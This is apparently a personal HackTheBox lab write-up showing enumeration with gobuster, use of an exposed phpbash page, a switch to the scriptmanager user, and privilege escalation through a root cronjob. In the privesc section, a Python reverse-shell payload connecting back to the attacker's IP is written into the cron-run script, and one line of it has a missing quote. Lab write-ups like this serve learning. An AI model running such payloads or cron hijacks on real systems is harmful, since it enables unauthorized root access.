
### Port Scanning, General Enumeration and Access (Nmap, Gobuster)
Initial scan showed that the only port available is 80 (HTTP)


Looks like a pretty neat tool, but not a lot to go on.
`gobuster dir -u http://10.10.10.68/ -w /dirs/small.txt -x php`

`/dev`?

found the phpbash thing!


---
### Privesc (php reverse shell, python, cronjobs)
We can upload files to the `/uploads` directory in the webroot

Let's get a real shell

`python3 -c 'import pty; pty.spawn("/bin/bash")'`

Easy enough to switch to `scriptmanager`
`sudo -u scriptmanager /bin/bash`
There's a scripts folder owned by `scriptmanager`


Interesting, the python script is ours but text file is owned by root?

I see, so the script runs and creates that file.

Moving the old `test.txt` to `test.txt.bak` and re-running the script we can see that the new `test.txt` is owned by us. That leads me to believe that something with root privs ran that prior. Maybe a cronjob? Let's test

It's back and with root privs!
Let's give this boring old `test.py` some fangs.
```Python
import socket,subprocess,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.18,4445))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
```
I created the new `test.py` on my machine and transferred it over. Started a listener and...


---
Back to [[HackTheBox Index]]
Tags: #gobuster #htb #cron #python #hackthebox #box_writeups
Related: